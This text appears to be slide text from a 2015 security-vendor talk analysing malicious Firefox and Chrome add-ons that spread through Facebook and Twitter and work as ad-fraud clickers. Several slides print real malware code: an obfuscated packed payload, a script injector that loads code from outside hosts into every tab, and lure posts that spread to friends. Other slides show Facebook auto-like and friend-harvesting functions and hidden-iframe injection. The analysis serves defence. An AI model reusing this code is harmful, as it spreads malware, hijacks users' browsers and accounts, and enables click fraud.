Post on 07-Aug-2015
Agenda
• Simple way to steal credentials• Click for me• Executable clicker• Data from AVAST CommunityIQ userbase• Summary• Questions
Payloads for FF and Chromeeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){
whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ;2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25||2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25||2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")==""){2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65)){2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71\'\'80&68\'24&76`74}5", 17,8)}},64:9(){36 10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="") {2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101; 102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26){63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28 103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15){34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26){15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)|0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15){39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));
Change setting in browser
TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9
TestAddon.ch default string
TestAddon.date user set string 1340624313
TestAddon.guid user set string 3c94f90903f031a799162872a55742e8
TestAddon.int user set string 60
TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5
j.php content
function updated(tabId, changeInfo, tab){ if(changeInfo.status == 'complete'){ chrome.tabs.executeScript(tabId, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm6.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null); } } chrome.tabs.onUpdated.addListener(updated); chrome.tabs.getAllInWindow(null,function(tabs){ for(var i=0;i < tabs.length;i++){ chrome.tabs.executeScript(tabs[i].id, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm76.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null); } });
js_f.php
• Two different ways1. Spreading malware to other people and works as a clicker
2. Only clicker
Spreading malware
• Script updates the victim’s Facebook and twitter status by posting new status messages
Spreading malware
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
if ((1 == 1)) {
var randomnumber = Math.floor(Math.random() * 100);
if (randomnumber > 0) {
Spreading malware
var uri = "http://tol.co/5q";
if ((document.location.href.search("tagged.com") > -1)) {
var ids = get_friends_t(1);
if (ids.length > 0) {
for (var i in ids) {
send_msg(uri, ids[i], "2222")
}
} else {
post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222")
}
}
Functionality
function likepage(pageid) {
var likepost = "fbpage_id=" + pageid + "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest";
var likepage = new XMLHttpRequest();
likepage.open("POST", "/ajax/pages/fan_status.php?__a=1");
likepage.send(likepost)
}
Functionality
function get_online_friends(limit) {
var friends = get_friends(limit);
var friends = make_array(friends);
friends.sort();
var postfields = "user=" + uid;
for (var i = 0; i < friends.length; i++) {
postfields += "&available_user_info_ids[" + i + "]=" + friends[i]
}
Functionality
function get_solved_captcha(extra_challenge_params, opt) {
var output = new Array(3);
var post = new XMLHttpRequest();
post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false);
post.send();
if (post.readyState == 4 && post.status == 200) {
data = eval('(' + post.responseText + ')');
console.log(data);
post[1] = data.key;
post[2] = data.challenge
}
Create injected iframe function createIframe(src) { var ifr = document.createElement("iframe"); ifr.setAttribute("src", src); ifr.style.position = "absolute"; ifr.style.top = "0"; ifr.style.left = "0"; ifr.style.width = "100%"; ifr.style.height = "100%"; document.body.appendChild(ifr) } function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id } function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv }
Clicker
• BHO, Firefox and Chrome payloads contain link to site like
http://resultsz.com/search/anticheat6.php?username=foreste
• There is hosted list of sites used by all of those “clickers” for injecting hidden iframe with every visited site and earning money to the blackhat.
Summary
• Be aware of social engineering– Even simple attempts can be successful
• Social networks are used for spreading malware– More user == more efficiency
• Trendy topics, celebrities and latest news are often start point for these infection vectors